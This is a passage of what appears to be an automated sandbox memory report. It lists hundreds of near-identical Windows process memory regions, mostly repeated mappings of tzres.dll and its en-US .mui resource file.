name = "pagefile_0x0000000000a60000"
filename = ""
Region:
id = 2823
start_va = 0xa70000
end_va = 0xa77fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a70000"
filename = ""
Region:
id = 2824
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2825
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2826
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2827
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2828
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2829
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2830
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2831
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2832
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2833
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2834
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2835
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2836
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2837
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2838
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2839
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2840
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2841
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2842
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2843
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2844
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2845
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2846
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2847
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2848
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2849
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2850
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2851
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2852
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2853
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2854
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2855
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2856
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2857
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2858
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2859
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2860
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2861
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2862
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2863
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2864
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2865
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2866
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2867
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2868
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2869
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2870
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2871
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2872
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2873
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2874
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2875
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2876
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2877
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2878
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2879
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2880
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2881
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2882
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2883
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2884
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2885
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2886
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2887
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2888
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2889
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2890
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2891
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2892
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2893
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2894
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2895
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2896
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2897
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2898
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2899
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2900
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2901
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2902
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2903
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2904
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2905
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2906
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2907
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2908
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2909
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2910
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2911
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2912
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2913
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2914
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2915
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2916
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2917
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2918
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2919
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2920
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2921
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2922
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2923
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2924
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2925
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2926
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2927
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2928
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2929
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2930
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2931
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2932
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2933
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2934
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2935
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2936
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2937
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2938
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
